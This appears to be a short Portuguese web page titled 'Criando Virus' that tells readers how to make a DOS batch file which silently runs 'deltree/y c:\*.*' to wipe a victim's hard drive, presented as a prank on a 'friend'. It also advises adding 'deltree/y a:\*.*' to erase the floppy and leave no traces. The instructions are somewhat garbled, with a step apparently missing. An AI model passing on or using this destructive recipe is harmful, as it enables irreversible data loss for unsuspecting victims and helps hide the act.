|
Criando
Virus |
|
Criando Virus Em primeiro lugar, você deve abrir o MS-DOS e seguir os passos abaixo: Digite: Edit (nome do seu arquivo).bat, deverá aparecer uma tela azul. Entre com os comandos: @ECHO OFF e BREAK OFF. A página deverá ficar da seguinte maneira, como está embaixo: @ECHO OFF
comando: deltree/y c:\*.* Agora, o vírus simples da pessoa está completo. É só a vítima (seu amiguinho) executar o arquivo e pronto! Importante: Caso a pessoa passe esse
vírus via disquete, ele não deve esqueçer de finalizar
o arquivo com o comando deltree/y a:\*.*. Isso serve para não deixar
vestígios de seu ato insano.
|